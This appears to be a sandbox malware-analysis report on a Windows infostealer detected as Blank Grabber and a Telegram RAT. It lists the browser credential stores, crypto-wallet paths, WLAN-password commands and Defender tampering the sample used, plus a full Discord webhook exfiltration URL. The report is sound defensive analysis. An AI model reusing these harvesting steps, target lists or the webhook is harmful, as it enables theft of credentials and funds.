              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B750D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6B750D010
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7525E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6B7525E7C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE948CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,83_2_00007FF64FE948CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies the hosts file
              Source: C:\Users\user\Desktop\program.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000001.00000003.2102475831.000001B5FEEF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1707785964.000002641A645000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1707785964.000002641A643000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: program.exe PID: 7308, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73082\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets[
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.wallet
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal WLAN passwords
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000001.00000003.2102475831.000001B5FEEF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1707785964.000002641A645000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1707785964.000002641A643000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: program.exe PID: 7308, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73082\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              File and Directory Permissions Modification              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts3
              Native API              		2
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		4
              Disable or Modify Tools              		LSASS Memory3
              File and Directory Discovery              		Remote Desktop Protocol3
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		11
              Deobfuscate/Decode Files or Information              		Security Account Manager48
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login Hook2
              Registry Run Keys / Startup Folder              		21
              Obfuscated Files or Information              		NTDS151
              Security Software Discovery              		Distributed Component Object ModelInput Capture5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp              		Cached Domain Credentials141
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc Filesystem1
              Remote System Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadow1
              System Network Configuration Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557107 Sample: program.exe Startdate: 17/11/2024 Architecture: WINDOWS Score: 100 67 ip-api.com 2->67 69 discord.com 2->69 83 Found malware configuration 2->83 85 Sigma detected: Capture Wi-Fi password 2->85 87 Multi AV Scanner detection for submitted file 2->87 89 10 other signatures 2->89 11 program.exe 22 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 107 Modifies Windows Defender protection settings 11->107 109 Adds a directory exclusion to Windows Defender 11->109 111 Tries to harvest and steal WLAN passwords 11->111 113 Removes signatures from Windows Defender 11->113 15 program.exe 1 90 11->15         started        signatures6 process7 dnsIp8 71 ip-api.com 208.95.112.1, 49743, 80 TUT-ASUS United States 15->71 73 discord.com 162.159.137.232, 443, 49744 CLOUDFLARENETUS United States 15->73 75 Found many strings related to Crypto-Wallets (likely being stolen) 15->75 77 Tries to harvest and steal browser information (history, passwords, etc) 15->77 79 Modifies Windows Defender protection settings 15->79 81 6 other signatures 15->81 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 28 other processes 15->26 signatures9 process10 signatures11 91 Suspicious powershell command line found 19->91 93 Uses cmd line tools excessively to alter registry or file data 19->93 95 Encrypted powershell cmdline option found 19->95 105 2 other signatures 19->105 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        97 Modifies Windows Defender protection settings 22->97 99 Removes signatures from Windows Defender 22->99 33 powershell.exe 23 22->33         started        43 2 other processes 22->43 101 Adds a directory exclusion to Windows Defender 24->101 35 powershell.exe 24->35         started        37 conhost.exe 24->37         started        103 Tries to harvest and steal WLAN passwords 26->103 39 getmac.exe 26->39         started        41 systeminfo.exe 26->41         started        45 54 other processes 26->45 process12 file13 115 Loading BitLocker PowerShell Module 33->115 117 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 39->117 119 Writes or reads registry keys via WMI 39->119 63 C:\Users\user\AppData\...\tgmup5d5.cmdline, Unicode 45->63 dropped 65 C:\Users\user\AppData\Local\Temp\MBLSI.zip, RAR 45->65 dropped 48 csc.exe 45->48         started        signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\tgmup5d5.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              program.exe45%ReversingLabsWin64.Trojan.Generic
              program.exe47%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\python313.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://schemas.mic;0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              		162.159.137.232
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBMfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabprogram.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
